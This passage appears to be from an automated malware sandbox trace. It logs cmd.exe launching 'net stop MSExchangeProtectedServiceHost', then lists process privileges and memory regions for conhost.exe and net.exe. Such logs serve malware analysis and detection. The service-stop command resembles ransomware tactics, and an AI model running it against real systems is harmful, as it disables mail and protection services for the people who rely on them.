lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0138.890] _wcsicmp (_String1="net", _String2=")") returned 69 [0138.890] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0138.890] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0138.890] _wcsicmp (_String1="IF", _String2="net") returned -5 [0138.890] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0138.890] _wcsicmp (_String1="REM", _String2="net") returned 4 [0138.890] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0138.891] GetConsoleTitleW (in: lpConsoleTitle=0x458f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.891] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0138.891] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0138.891] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0138.891] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0138.891] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0138.891] _wcsicmp (_String1="net", _String2="CD") returned 11 [0138.891] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0138.891] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0138.891] _wcsicmp (_String1="net", _String2="REN") returned -4 [0138.891] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0138.891] _wcsicmp (_String1="net", _String2="SET") returned -5 [0138.891] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0138.891] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0138.891] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0138.891] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0138.891] _wcsicmp (_String1="net", _String2="MD") returned 1 [0138.891] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0138.892] _wcsicmp (_String1="net", _String2="RD") returned -4 [0138.892] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0138.892] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0138.892] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0138.892] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0138.892] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0138.892] _wcsicmp (_String1="net", _String2="VER") returned -8 [0138.892] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0138.892] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0138.892] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0138.892] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0138.892] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0138.892] _wcsicmp (_String1="net", _String2="START") returned -5 [0138.892] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0138.892] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0138.892] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0138.892] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0138.892] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0138.892] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0138.892] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0138.892] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0138.892] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0138.892] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0138.892] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0138.892] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0138.892] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0138.892] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="CD") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0138.892] _wcsicmp (_String1="net", _String2="REN") returned -4 [0138.892] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0138.892] _wcsicmp (_String1="net", _String2="SET") returned -5 [0138.892] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0138.892] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0138.892] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0138.892] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0138.892] _wcsicmp (_String1="net", _String2="MD") returned 1 [0138.892] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0138.892] _wcsicmp (_String1="net", _String2="RD") returned -4 [0138.892] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0138.892] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0138.892] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0138.892] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0138.892] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0138.892] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0138.892] _wcsicmp (_String1="net", _String2="VER") returned -8 [0138.892] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0138.892] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0138.892] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0138.892] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0138.892] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0138.893] _wcsicmp (_String1="net", _String2="START") returned -5 [0138.893] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0138.893] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0138.893] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0138.893] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0138.893] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0138.893] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0138.893] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0138.893] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0138.893] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0138.893] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0138.893] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0138.893] _wcsicmp (_String1="net", _String2="IF") returned 5 [0138.893] _wcsicmp (_String1="net", _String2="REM") returned -4 [0138.893] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0138.893] SetErrorMode (uMode=0x0) returned 0x0 [0138.893] SetErrorMode (uMode=0x1) returned 0x0 [0138.893] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x49005d0, lpFilePart=0x458f01c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x458f01c*="Desktop") returned 0x1d [0138.893] SetErrorMode (uMode=0x0) returned 0x1 [0138.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0138.893] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.901] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0138.901] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0138.901] GetConsoleTitleW (in: lpConsoleTitle=0x458f29c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.901] InitializeProcThreadAttributeList (in: lpAttributeList=0x458f1c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x458f1ac | out: lpAttributeList=0x458f1c8, lpSize=0x458f1ac) returned 1 [0138.901] UpdateProcThreadAttribute (in: lpAttributeList=0x458f1c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x458f1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x458f1c8, lpPreviousValue=0x0) returned 1 [0138.901] GetStartupInfoW (in: lpStartupInfo=0x458f200 | out: lpStartupInfo=0x458f200*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0138.901] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0138.902] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0138.902] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0138.903] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeProtectedServiceHost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x458f150*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeProtectedServiceHost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x458f19c | out: lpCommandLine="net stop MSExchangeProtectedServiceHost", lpProcessInformation=0x458f19c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc5c, dwThreadId=0xc40)) returned 1 [0138.909] CloseHandle (hObject=0xa4) returned 1 [0138.909] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.909] GetEnvironmentStringsW () returned 0x4909f00* [0138.909] FreeEnvironmentStringsA (penv="=") returned 1 [0138.909] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0139.032] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x458f134 | out: lpExitCode=0x458f134*=0x2) returned 1 [0139.032] CloseHandle (hObject=0xa8) returned 1 [0139.032] _vsnwprintf (in: _Buffer=0x458f21c, _BufferCount=0x13, _Format="%08X", _ArgList=0x458f13c | out: _Buffer="00000002") returned 8 [0139.032] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0139.032] GetEnvironmentStringsW () returned 0x490b378* [0139.032] FreeEnvironmentStringsA (penv="=") returned 1 [0139.032] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0139.032] GetEnvironmentStringsW () returned 0x490b378* [0139.032] FreeEnvironmentStringsA (penv="=") returned 1 [0139.032] DeleteProcThreadAttributeList (in: lpAttributeList=0x458f1c8 | out: lpAttributeList=0x458f1c8) [0139.032] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.032] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.033] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.033] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.033] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.033] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.033] SetConsoleInputExeNameW () returned 0x1 [0139.033] GetConsoleOutputCP () returned 0x1b5 [0139.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.033] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.033] exit (_Code=2) Thread: id = 699 os_tid = 0xc64 Process: id = "234" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x13c84000" os_pid = "0xff8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "233" os_parent_pid = "0x9ec" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11365 start_va = 0x7fa25000 end_va = 0x7fa25fff entry_point = 0x0 region_type = private name = "private_0x000000007fa25000" filename = "" Region: id = 11366 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11367 start_va = 0xfb4a260000 end_va = 0xfb4a27ffff entry_point = 0x0 region_type = private name = "private_0x000000fb4a260000" filename = "" Region: id = 11368 start_va = 0xfb4a280000 end_va = 0xfb4a293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb4a280000" filename = "" Region: id = 11369 start_va = 0xfb4a2a0000 end_va = 0xfb4a2dffff entry_point = 0x0 region_type = private name = "private_0x000000fb4a2a0000" filename = "" Region: id = 11370 start_va = 0x7df5ff5c0000 end_va = 0x7ff5ff5bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5c0000" filename = "" Region: id = 11371 start_va = 0x7ff6c4130000 end_va = 0x7ff6c4152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4130000" filename = "" Region: id = 11372 start_va = 0x7ff6c4154000 end_va = 0x7ff6c4154fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4154000" filename = "" Region: id = 11373 start_va = 0x7ff6c415e000 end_va = 0x7ff6c415ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c415e000" filename = "" Region: id = 11374 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11375 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11376 start_va = 0xfb4a260000 end_va = 0xfb4a26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb4a260000" filename = "" Region: id = 11377 start_va = 0xfb4a270000 end_va = 0xfb4a276fff entry_point = 0x0 region_type = private name = "private_0x000000fb4a270000" filename = "" Region: id = 11378 start_va = 0xfb4a2e0000 end_va = 0xfb4a39dfff entry_point = 0xfb4a2e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11379 start_va = 0xfb4a3a0000 end_va = 0xfb4a3dffff entry_point = 0x0 region_type = private name = "private_0x000000fb4a3a0000" filename = "" Region: id = 11380 start_va = 0xfb4a3e0000 end_va = 0xfb4a3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb4a3e0000" filename = "" Region: id = 11381 start_va = 0xfb4a3f0000 end_va = 0xfb4a4effff entry_point = 0x0 region_type = private name = "private_0x000000fb4a3f0000" filename = "" Region: id = 11382 start_va = 0xfb4a4f0000 end_va = 0xfb4a4f6fff entry_point = 0x0 region_type = private name = "private_0x000000fb4a4f0000" filename = "" Region: id = 11383 start_va = 0xfb4a500000 end_va = 0xfb4a500fff entry_point = 0x0 region_type = private name = "private_0x000000fb4a500000" filename = "" Region: id = 11384 start_va = 0xfb4a510000 end_va = 0xfb4a510fff entry_point = 0x0 region_type = private name = "private_0x000000fb4a510000" filename = "" Region: id = 11385 start_va = 0xfb4a5e0000 end_va = 0xfb4a5effff entry_point = 0x0 region_type = private name = "private_0x000000fb4a5e0000" filename = "" Region: id = 11386 start_va = 0xfb4a5f0000 end_va = 0xfb4a777fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb4a5f0000" filename = "" Region: id = 11387 start_va = 0xfb4a780000 end_va = 0xfb4a900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb4a780000" filename = "" Region: id = 11388 start_va = 0xfb4a910000 end_va = 0xfb4bd0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb4a910000" filename = "" Region: id = 11389 start_va = 0x7ff6c4030000 end_va = 0x7ff6c412ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4030000" filename = "" Region: id = 11390 start_va = 0x7ff6c415c000 end_va = 0x7ff6c415dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c415c000" filename = "" Region: id = 11391 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 11392 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 11393 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11394 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11395 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11396 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11397 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11398 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11399 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11400 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11401 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11402 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11403 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11404 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 696 os_tid = 0x778 Thread: id = 697 os_tid = 0x8bc Thread: id = 698 os_tid = 0xc60 Process: id = "235" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x14940000" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "233" os_parent_pid = "0x9ec" cmd_line = "net stop MSExchangeProtectedServiceHost" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11418 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 11419 start_va = 0xaf0000 end_va = 0x4aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 11420 start_va = 0x4af0000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 11421 start_va = 0x4b10000 end_va = 0x4b11fff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 11422 start_va = 0x4b20000 end_va = 0x4b33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b20000" filename = "" Region: id = 11423 start_va = 0x4b40000 end_va = 0x4b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 11424 start_va = 0x4b80000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 11425 start_va = 0x4c00000 end_va = 0x4c03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c00000" filename = "" Region: id = 11426 start_va = 0x4c10000 end_va = 0x4c10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 11427 start_va = 0x4c20000 end_va = 0x4c21fff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 11428 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11429 start_va = 0x7f120000 end_va = 0x7f142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f120000" filename = "" Region: id = 11430 start_va = 0x7f149000 end_va = 0x7f149fff entry_point = 0x0 region_type = private name = "private_0x000000007f149000" filename = "" Region: id = 11431 start_va = 0x7f14c000 end_va = 0x7f14efff entry_point = 0x0 region_type = private name = "private_0x000000007f14c000" filename = "" Region: id = 11432 start_va = 0x7f14f000 end_va = 0x7f14ffff entry_point = 0x0 region_type = private name = "private_0x000000007f14f000" filename = "" Region: id = 11433 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11434 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11435 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11436 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11437 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11438 start_va = 0x4d60000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 11439 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11440 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11441 start_va = 0x4ea0000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = 